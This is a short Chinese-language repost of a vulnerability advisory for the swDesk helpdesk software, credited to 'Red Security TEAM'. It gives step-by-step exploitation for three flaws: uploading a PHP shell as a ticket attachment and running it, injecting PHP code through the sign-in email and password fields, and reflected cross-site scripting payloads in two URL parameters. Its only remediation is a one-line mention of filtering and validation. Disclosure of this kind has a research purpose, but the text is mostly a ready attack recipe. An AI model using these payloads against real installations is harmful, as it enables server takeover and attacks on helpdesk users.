swDesk Multiple Vulnerabilities -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    swDesk多个缺陷

    这作者: Red Security TEAM

    开发者: http://www.swdesk.com/

    测试平台: Apache

    测试:

    #

    # I. 任意文件上传

    # 1. Go to http:// /create_ticket.php

    # 2. Fil all Input Fields And Click on Submit Ticket

    # 3. Click on the View Ticket and you should go to the link Like : http:// /view_ticket.php?email=[Your Email]&id=1

    # 4. You see Send Message box , Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message

    # 5. You can see your attachment above Like : Attachment: shell.php , Click on it and you see your PHP code has been runed ;)

    #

    # II. PHP代码注入

    # 1. Go to http:// /signin.php : Vulnerability Input Fields : email , password

    # 2. Write your php in Input Fields Like : phpi${@print(RedSecurityTEAM)}

    #

    # III. XSS 缺陷

    # 1. http:// /view_ticket.php?email=example@example.com&id=" nmouseover=alert(1) bad="

    # 2. http:// /kb_search.php?keywords=" nmouseover=alert(1) bad="&mode=Search

    修复:

    针对性过滤和验证

最新文章